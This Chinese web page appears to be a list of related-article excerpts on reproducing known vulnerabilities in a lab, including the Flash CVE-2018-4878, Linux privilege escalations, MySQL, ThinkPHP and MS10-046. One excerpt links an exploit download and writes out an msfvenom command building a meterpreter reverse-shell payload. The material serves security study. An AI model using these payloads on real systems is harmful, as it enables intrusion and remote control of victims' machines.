本地复现Flash 0day漏洞(CVE-2018-4878)】的更多相关文章

影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.94 LPORT=2333 -f python>/…
该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞. 本文作者:i春秋作家——F0rmat 前言 这几天很忙,已经有两天没有更新文章了,最近CVE-2018-4878挺火的,还有群里的人也问这个怎么复现.今天就献丑复现一下,大表哥别喷,虽然我还没研究到这方面的漏洞分析,我会努力的,相信不久我也能写出二进制漏洞分析的文章. 从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应…
  0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击.攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档.网页.垃圾电子邮件等. 0x02 漏洞影响 Flash…
本次免考实践提纲及链接 第一部分 基础知识 1.1 0day漏洞概述 1.2二进制文件概述 1.3 必备工具 1.4 crack实验 第二部分 漏洞利用 2.1栈溢出利用 2.1.1 系统栈工作原理 2.1.2 修改邻接变量 2.1.3 修改函数返回地址 2.1.4 代码植入 2.2 DEP 2.2.1 DEP机制的保护原理 2.2.2 linux下利用Ret2Lib绕过DEP 2.2.3 windows下利用Ret2Libc绕过DEP 2.3 GS 2.3.1 GS安全编译选项的保护原理 2.…
1.漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell. 2.实验环境 攻击机:kali 2017 + exp:cve-2018-4878.py 攻击机IP:192.168.190.130 靶机:Windows 7 +…
一.Ubuntu16.04 (CVE-2017-16995) 1.漏洞概述 Ubuntu最新版本16.04存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题. 攻击者(普通用户)可以利用该漏洞进行提权攻击,获取root权限,危害极大.该漏洞编号是CVE-2017-16995,在之前的一些老版本已经修复了,但是在最新的Ubuntu版本中,又出现了这个漏洞,并且Twitter爆出了漏洞利用…
一.前言介绍 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 从Adobe公告来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KRCERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发 起攻击. 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会 被“远程代码执行”,并且…
Linux本地内核提权漏洞复现(CVE-2019-13272) 一.漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数.但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用. PTRACE_TRACEME获取父进程的凭证,使其能够像父进程一样执行父进程能够执行的各种操作.如果恶意低权限子进程使用PTRACE_TRACEME并且该子进程的父进程具有高权限,该子进程可获取其父…
2016年9月12日, legalhackers.com网站发布了编号为CVE-2016-6662的0day漏洞公告 .由于该漏洞可以获得MySQL服务器的Root权限,且影响MySql5.5.5.6.5.7乃至最新版本,高级威胁预警通告,这意味着该漏洞影响范围比较广,危害严重,利用难度较低,绿盟科技将在7*24小时内部应急跟踪,24小时内完成技术分析.产品升级和防护方案. 该漏洞可以允许攻击者远程向MySQL配置文件(my.cnf)注入恶意的环境配置,从而导致严重后果.该漏洞将影响以默认方式进…
  #1背景 Spring Data REST是Spring Data项目的一部分,可以轻松地在Spring Data存储库之上构建超媒体驱动的REST Web服务. 恶意的PATCH请求使用精心构造的JSON数据提交到spring-data-rest服务可以执行任意JAVA代码 #2 影响范围 Spring Data REST versions prior to 2.5.12, 2.6.7, 3.0 RC3 可以查看spring-data-rest-webmvc jar包的版本 #3 漏洞本地…
漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞. 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码. 漏洞复现: 攻击机 IP:192…
thinkphp远程执行漏洞的本地复现 0X00漏洞简介 由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell(可以控制服务器) 0X01环境搭建 下载存在漏洞版本我下载的版本是thinkphp_5.0.22搭建好以后如图 0X02漏洞复现 构造几个特殊的url即可复现漏洞. http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/…
0x00 简介 2019年07月20日,Linux正式修复了一个本地内核提权漏洞.通过此漏洞,攻击者可将普通权限用户提升为Root权限. 0x01 漏洞概述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数.但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用. PTRACE_TRACEME获取父进程的凭证,使其能够像父进程一样执行父进程能够执行的各种操作.如果恶意低权限子进程使…
20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellcode 和 Return-to-libc攻击实验 http://www.cnblogs.com/20145330swx/p/6514359.html 摘要 本次免考项目分为两个模块:Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 Eternalblue…
英文原文地址:https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html 中文原文地址:https://www.4hou.com/vulnerable/16468.html 翻译作者:ang010ela 发布日期:2019年3月1日发布 版权:嘶吼(如遇版权纠纷请联系QQ:2200475850进行删除!) 导语:​研究人员发现一起利用chrome 0day漏洞的恶意PDF样本,当用Google Chrom…
微软近日对外披露了两个0day漏洞详情,其中一个漏洞存在Adobe阅读器中,可被利用导致任意代码执行:另一个漏洞则允许任意代码在Windows kernel内存中提权执行. 微软称由于该漏洞利用目前还处于初期阶段,且官方都已发布了补丁,建议大家及时进行安装,赶在被大规模利用前修复,未雨绸缪.同时,建议排查初期样本的IOC(文末附修复补丁链接和IOC). CVE CVE-2018-4990 CVE-2018-8120 类型 远程代码执行 本地提权 官方评级 Critical Important 影…
20155306 白皎 0day漏洞--(第一篇)基础知识 写在前面: 本次免考实践方向是0day漏洞,以博客的形式记录了我的学习实践过程.第一篇博客主要围绕什么是0day漏洞以及一些以后学习中需要的基础知识和必备工具进行简单介绍和具体的操作. 一.漏洞概述 1. 漏洞与bug 我们通常把一些引起系统软件做"超出设计范围内的事情"的bug称作是漏洞,实际上漏洞和bug也是有一些区别的. 功能性的缺陷(bug):影响软件的正常功能,例如执行结果错误.图标显示错误等. 安全性逻辑缺陷(漏洞…
6月11日,阿里云安全团队发现WebLogic CVE-2019-2725补丁绕过的0day漏洞,并第一时间上报Oracle官方, 6月12日获得Oracle官方确认.由于Oracle尚未发布官方补丁,漏洞细节和真实PoC也未公开,为保障客户的安全性,阿里云Web应用防火墙(WAF)紧急更新规则,已实现对该漏洞的默认防御. 一.漏洞简介 WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,被广泛应用于保险.证券.银行等金融领域. 此次发…
文章作者MG1937 CNBLOG博客:ALDYS4 QQ:3496925334 0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用权限 或者进行恶意钓鱼攻击 由于该漏洞允许恶意软件劫持合法应用的活动,并将自身恶意活动插入在合法活动之前 使得用户并没有意识到自己已经遭到攻击 [漏洞影响Android版本] 至2020年1月26日,经过测试,该漏洞影…
在报纸上看到xx又爆出0day漏洞是什么意思? day漏洞,是已经发现但是官方还没发布补丁的漏洞. 信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息. http://baike.baidu.com/view/1123216.htm…
描述 Apache Struts2 近日出现一个0day漏洞,该漏洞在修补CVE-2014-0050和2014-0094两个安全漏洞处理不当,分别可以导致服务器受到拒绝服务攻击和被执行恶意代码. 漏洞影响版本: Apache Struts 2.0.0 - 2.3.16.1 解决方案: 升级到最新版(struts2.3.16.1),下载地址:http://struts.apache.org/download.cgi#struts2316-SNAPSHOT…
WinRAR 0day漏洞(附利用过程) 英国安全机构Mohammad Reza Espargham的漏洞实验室发现,流行压缩工具WinRAR 5.21最新版里存在一个安全漏洞,目前该漏洞还属于零日漏洞,同时官方正在全力修补该漏洞.同时报告该问题的还有Malwarebytes的 Pieter Arntz. 英国安全机构Mohammad Reza Espargham的漏洞实验室同时发现当用户打开SFX文件时,攻击者可利用该漏洞远程执行恶意代码. WinRAR是一个用于压缩和解压缩的应用程序,有超过…
0Day的概念最早用于软件和游戏破解,属于非盈利性和非商业化的组织行为,其基本内涵是“即时性”. Warez被许多人误认为是一个最大的软件破解组 织,而实际上,Warez如黑客一样,只是一种行为. 0Day也是.当时的0Day是指在正版软件或游戏发布的当天甚至之前,发布附带着序列号或者解密器 的破解版,让使用者可以不用付费就能长期使用. 因此,虽然Warez和0Day都是反盗版的重要打击对象,却同时受到免费使用者和业内同行的推崇.尽管 Warez和0Day的拥护者对以此而谋利的盗版商不齿,但商业…
Wordfence 安全研究员发布报告称,WordPress 商用插件 Total Donations 受多个 0day 漏洞的影响,且这些漏洞已遭利用. 这些严重的漏洞影响所有已知的 Total Donations 版本(包括版本 2.0.5 在内),可导致恶意人员获得对受影响 WordPress 站点的管理权限.由于该插件的开发人员尚未做出任何回应,因此建议用户完全删除该插件. Total Donations 是由 Calmar Webmedia 开发的,旨在让在线捐赠接受活动变得更加容易,…
20155306 白皎 0day漏洞--漏洞利用原理之GS 一.GS安全编译选项的保护原理 1.1 GS的提出 在第二篇博客(栈溢出利用)中,我们可以通过覆盖函数的返回地址来进行攻击,面对这个重灾区,Windows在VS 7.0(Visual Studio 2003)及以后版本的Visual Studio中默认启动了一个安全编译选项--GS(针对缓冲区溢出时覆盖函数返回地址这一特征),来增加栈溢出的难度. 1.2 GS的工作原理 GS编译选项为每个函数调用增加了一些额外的数据和操作,用以检测栈中…
20155306 白皎 0day漏洞--漏洞利用原理之DEP 一.DEP机制的保护原理 1.为什么出现DEP? 溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的修补来减少溢出带来的损害,DEP(数据执行保护,Data Execution Prevention)就是用来弥补计算机对数据和代码混淆这一天然缺陷的. 2.DEP是什么? DEP-数据执行保护的缩写,DataExecutionPrevention.能…
20155306 白皎 0day漏洞--漏洞利用原理之栈溢出利用 一.系统栈的工作原理 1.1内存的用途 根据不同的操作系统,一个进程可能被分配到不同的内存区域去执行.但是不管什么样的操作系统.什么样的计算机架构,进程使用的内存都可以按照功能大致分为以下4个部分: 代码区:这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指并执行. 数据区:用于存储全局变量等. 堆区:进程可以在堆区动态地请求一定大小的内存,并在用完之后归还给堆区.动态分配和回收是堆区的特点. 栈区:用于动态地存储函…
Firefox 刚刚修复的 0day 漏洞被用于攻击 Coinbase 雇员.Coinbase 安全团队的 Philip Martin 称,攻击者组合利用了两个 0day 漏洞,其一是远程代码执行漏洞,其二是沙盒逃脱漏洞. 远程代码执行漏洞是 Google Project Zero 安全团队的研究员 Samuel Groß 发现的,他称自己在 4 月 15 日向 Mozilla 报告了这个漏洞. 目前不清楚攻击者是从什么地方获知漏洞细节的,可能是独立发现,也可能是从内部人士获得了信息,或者可能是…
漏洞复现:MS10-046漏洞 实验工具1.VMware虚拟机2.Windows7系统虚拟机3.Kali 2021 系统虚拟机 1.在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通. 2.确定IP 地址和网络连接正常后,Kali 2021中输入命令[msfconsole]进入MSF攻击框架. 3.进入MSF攻击框架后,搜索MS10-046漏洞,输入命令[search ms10_046],回车执行命令,搜索到下列漏洞. 4.引用编号…
一.复现环境搭建 搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162): 靶机:debian (192.168.217.150). 二.Debian安装并配置samba 1.首先,下载安装samba服务器 # apt-get install samba 2.在debian下创建一个共享目录,我这里为/mnt/shared # mkdir /mnt/shared 3.配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加: [sha…